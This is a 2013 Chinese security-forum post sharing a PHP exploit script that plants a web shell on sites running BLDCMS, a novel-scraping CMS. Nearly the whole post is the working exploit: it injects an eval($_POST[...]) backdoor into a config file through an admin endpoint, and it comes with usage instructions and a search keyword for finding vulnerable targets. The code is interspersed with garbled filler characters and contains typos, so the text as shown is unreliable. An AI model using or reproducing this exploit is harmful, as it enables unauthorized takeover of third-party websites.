找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2343|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞% @* k! {7 z4 r7 t  q" R# a% C' H

8 ]7 e' n! j+ l( h; H# ?: N   Y2 t* r. I3 O. t5 w1 m: O1 A) |
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
* Y1 a; M5 B0 K& W( s $ @. H& j1 A- X$ S. f
既然都有人发了 我就把我之前写好的EXP放出来吧- \2 O- U& ], b7 t

2 |! ~6 n0 B7 s$ m6 Bview source print?01.php;">
9 X9 m$ v, L4 `! y9 s02.<!--?php
, g, w- b+ K8 Q  |0 b03.echo "-------------------------------------------------------------------. H. B$ {2 J" j1 N. ]/ M1 h2 z" x
04. 4 p" {7 y$ W' S& g0 B
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
5 j) V# G; L* \- e06. 9 ~+ L( a4 P$ C9 j$ e! c2 L" c
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
$ ~$ i5 ]! ?( B4 C$ g" `& @08. ; C5 x; p( }6 U* k& A- n
09.QQ:981009941\r\n                                2013.3.21\r\n            
& I5 P5 J+ f, O* K. e5 g' ]10.
8 z9 v* O; Y1 z$ S11.
3 J4 x- U1 k' h$ k# p2 D12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
! N4 P2 J0 |9 E# j13. , A, h  P' S" u5 H! A, \% ^
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------; {  W; O! A3 G8 A  ]
15.
$ i+ G' t+ A. l, M  W8 y16.--------------------------------------------------------------------\r\n";
1 _: ?8 X' r7 y& @. F0 g4 I& H8 T17.$url=$argv[1];# s! T. V" w7 j' A
18.$dir=$argv[2];& o, R  W/ P+ t7 G. v& _
19.$pass=$argv[3];
: s+ s/ F7 a  x4 W6 Y* q. {20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
( x" h. Z1 V; K$ a& j, ^+ w  R21.if (emptyempty($pass)||emptyempty($url))* M3 \' x+ ^/ q$ A7 Z  U
22.{exit("请输入参数");}; a% R! `. }) j/ ^5 m. C
23.else6 O' D6 l: u; q# a
24.{$ m! N1 D2 ~0 U* W' O8 l2 q
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
1 l7 Q3 O0 F5 i+ W4 o7 w5 }26.
) u/ [. n! a4 d# u27.al;
% C. i3 U. }$ U$ @8 F" N( o28.$length = strlen($fuckdata);' ?$ p1 n: t2 \$ t
29.function getshell($url,$pass)0 P; d, H2 N" V% E- ~9 j$ g
30.{
6 H' @, d+ V# ~31.global $url,$dir,$pass,$eval,$length,$fuckdata;0 v) b' T  H% Z1 D/ v4 X" T  X
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";8 y- @# W$ B5 J5 j  J* i$ |. x
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
" p: \  J. L) @4 z; j, ~34.$header .= "User-Agent: MSIE\r\n";
. c( E1 o5 s% P35.$header .= "Host:".$url."\r\n";! r* c+ b8 v, v' V7 X" ~7 L. Y: y
36.$header .= "Content-Length: ".$length."\r\n";3 l4 ]" o5 t7 H% y
37.$header .= "Connection: Close\r\n";
6 P. ^6 w! R8 x( v- ]38.$header .="\r\n";
/ Y* h- V7 |% {' C) f: k39.$header .= $fuckdata."\r\n\r\n";! N( ?) F9 b! y$ G) T6 z1 C
40.$fp = fsockopen($url, 80,$errno,$errstr,15);1 S$ Y5 n. K0 O
41.if (!$fp)
" E8 k1 v5 A! a4 d42.{! c" B. t9 y5 ^9 U/ ~$ b1 r
43.exit ("利用失败:请检查指定目标是否能正常打开");$ b6 h3 Y5 \' p- o. {8 C
44.}; G! d" _8 x5 u2 `4 I
45.else{ if (!fputs($fp,$header))
! D1 e% ~  E* K" u# n# S  V' s46.{exit ("利用失败");}
0 w% F3 X2 N7 X6 A4 Z47.else
2 b. f0 G# D/ h- ~7 u48.{
9 z& j' Y2 E- ]4 t49.$receive = '';& u( m; P, Q- `* ]; e  m% K
50.while (!feof($fp)) {
; I7 N- N% \! b5 r( x7 @$ r) J& y51.$receive .= @fgets($fp, 1000);
& d2 N/ e/ w5 j: z2 W7 {( V2 z52.}5 b5 @# T$ p/ m6 `  M# E4 i( ]9 \
53.@fclose($fp);+ d  {1 @1 e4 @9 \9 U; z; i5 S8 h7 r3 |
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标' N' X+ Z  I4 [# C! n
55.
+ V8 X+ B1 H1 H2 B/ p" F/ g! N56.GPC是否=off)";
- B& J0 W0 ^% r: O; x4 x) }57.}}6 x0 v% G. i+ [3 P0 o- W+ F
58.}
+ T" }; |: J( X# ^2 ^+ o- _59.}
! Y, @' t( R6 Z& d60.getshell($url,$pass);
- s6 h  Z- t! `% T; }* p61.?-->
" d; F2 r* J% g* @( C; i% h1 a' F : }8 u) k9 a1 `: I& |) K, B6 ~
# m( E! \2 @: G. p' u; |

0 H! D7 |; X5 |3 hby 数据流+ G( W- j' r! m# X1 ]$ I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表